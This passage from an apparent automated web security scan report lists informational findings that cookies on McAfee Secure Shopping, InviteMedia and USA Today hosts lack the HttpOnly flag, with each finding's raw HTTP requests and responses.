Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:35 GMT
ETag: "CdLEBc9iPUl"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:35 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 99
Date: Mon, 16 May 2011 01:32:35 GMT

GIF89a...........#&.#&.$%.$&.$&.#&.#&.$&....$&...............!.......,...........0I..E6#D.9B1.F...;

16.120. http://secureshopping.mcafee.com/images/nav-menu-left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-left.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:27 GMT
ETag: "CdLEBc9iPZc"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 410
Date: Mon, 16 May 2011 01:32:26 GMT

GIF89a........#&.#&.#&....$&.$&.$%.............$%....#%....#%....&*..........$%.......~...........$&.#%..........#&.#&.$&.$&.#&.$&....$&................................................................
...[SNIP]...

16.121. http://secureshopping.mcafee.com/images/nav-menu-right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:29 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-right.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:29 GMT
ETag: "CdLEBc9iPZh"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:29 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 415
Date: Mon, 16 May 2011 01:32:29 GMT

GIF89a........#&.#&.#&....$&.$&.$%.............$%....#%....#%....&*..........$%.......~...........$&.#%..........#&.#&.$&.$&.#&.$&....$&................................................................
...[SNIP]...

16.122. http://secureshopping.mcafee.com/images/nav-menu-split.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-split.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-split.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:30 GMT
ETag: "CdLEBc9iPTv"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:30 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 45
Date: Mon, 16 May 2011 01:32:30 GMT

GIF89a.............!.......,...........D..X.;

16.123. http://secureshopping.mcafee.com/images/nav-menu-tab-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-tab-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-tab-bg.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:37 GMT
ETag: "CdLEBc9iPVt"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:36 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 171
Date: Mon, 16 May 2011 01:32:36 GMT

GIF89a.......................................................................................................!.......,..........(.eUdYQ(UM.D(..<..... Ep..F".p. H.2.......;

16.124. http://secureshopping.mcafee.com/images/nav-menu-tab-left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-tab-left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-tab-left.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:30 GMT
ETag: "CdLEBc9iPWH"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:30 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 197
Date: Mon, 16 May 2011 01:32:30 GMT

GIF89a.......................................................................................................!.......,..........B EUcTE.$..TI.<5n.T.R.F....a.xL....PQ(*.D%..8......L..DbB..+h..RH...;

16.125. http://secureshopping.mcafee.com/images/nav-menu-tab-right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-tab-right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-tab-right.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:30 GMT
ETag: "CdLEBc9iPWH"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:30 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 197
Date: Mon, 16 May 2011 01:32:30 GMT

GIF89a.......................................................................................................!.......,..........B v].XU..M..Nh.`.ESV.a..5. .y<0..... ....".`.
...Y,,..fL..-...c....;

16.126. http://secureshopping.mcafee.com/images/nav-search-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-search-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-search-bg.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:37 GMT
ETag: "CdLEBc9iPVs"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:36 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 170
Date: Mon, 16 May 2011 01:32:36 GMT

GIF89a..A....................................................................................................!.......,......A...' .1....EYV3E.#T.Sl..I..d. .C,..H..3Hd.!.;

16.127. http://secureshopping.mcafee.com/js/core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:39:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/core.js?1 HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:39:57 GMT
ETag: "CdLEBc9iRVd"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:39:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 8347
Date: Mon, 16 May 2011 01:39:56 GMT

function m_qt_focus() {
var e = document.getElementById("qt");
if(e) e.focus();
}
function m_qt_search(id) {
var v = document.getElementById(id).value;
if(v == '' || v == 'What are you sho
...[SNIP]...

16.128. http://secureshopping.mcafee.com/js/ga_init.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/ga_init.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ga_init.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:27 GMT
ETag: "CdLEBc9iPUr"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 105
Date: Mon, 16 May 2011 01:32:26 GMT

var pageTracker = _gat._getTracker("UA-383036-6");
pageTracker._initData();
pageTracker._trackPageview();

16.129. http://secureshopping.mcafee.com/js/ga_track_click.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/ga_track_click.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ga_track_click.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:27 GMT
ETag: "CdLEBc9iPZ/"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 445
Date: Mon, 16 May 2011 01:32:26 GMT

function trackclick(index){
   if (index >= 0){
       if (orderId[index] != null){
           pageTracker._addTrans(
               orderId[index],
               "McAfeeSecureShopping",
               clickValueStr[index],
               "0.00",
               "0.00",
...[SNIP]...

16.130. http://secureshopping.mcafee.com/js/ga_track_click_init.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/ga_track_click_init.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ga_track_click_init.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:27 GMT
ETag: "CdLEBc9iPUi"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 96
Date: Mon, 16 May 2011 01:32:26 GMT

var orderId = [];
var clickValueStr = [];
var sku = [];
var productName = [];
var category = [];

16.131. http://secureshopping.mcafee.com/js/google_ads_7409232867.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/google_ads_7409232867.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/google_ads_7409232867.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:27 GMT
ETag: "CdLEBc9iPVN"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 139
Date: Mon, 16 May 2011 01:32:26 GMT

google_ad_client = "pub-9942530385485090";
/* Footer 728x90 */
google_ad_slot = "7409232867";
google_ad_width = 728;
google_ad_height = 90;

16.132. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

segments_p1="eJzjYuGYNZmRi4VjzlsQuWMdIxczx2IBIPPmBWYgsysTyNzynwkAuF4Jvw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 01:42:56 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.133. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/images/no-user-image.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/no-user-image.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 498
Content-Type: image/gif
Last-Modified: Tue, 15 Dec 2009 21:35:27 GMT
Accept-Ranges: bytes
ETag: "239c7984ce7dca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:35 GMT
Connection: close

GIF89a:.:....................................................................................................!.......,....:.:.... $.di.h..l..p,.tm... .....p.x..GE. .%..(Rph......`ZU...X.~M...p6-..q.M.
...[SNIP]...

16.134. http://sitelife.usatoday.com/ver1.0/Content/images/store/13/1/6dbb68f3-e8dc-464d-81c0-091488dbd2b9.P4Avatar.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/images/store/13/1/6dbb68f3-e8dc-464d-81c0-091488dbd2b9.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/13/1/6dbb68f3-e8dc-464d-81c0-091488dbd2b9.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 1288
Content-Type: image/jpeg
Last-Modified: Tue, 18 May 2010 08:41:57 GMT
Accept-Ranges: bytes
ETag: "e46f70f965f6ca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:44 GMT
Connection: close

......JFIF.....`.`.....C......................... ....................!........."$".$.......C.......................................................................(.(.."..............................
...[SNIP]...

16.135. http://sitelife.usatoday.com/ver1.0/Content/images/store/8/8/f80cbc5e-6704-417a-b8ad-a6e027a19299.P4Avatar.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/images/store/8/8/f80cbc5e-6704-417a-b8ad-a6e027a19299.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/8/8/f80cbc5e-6704-417a-b8ad-a6e027a19299.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
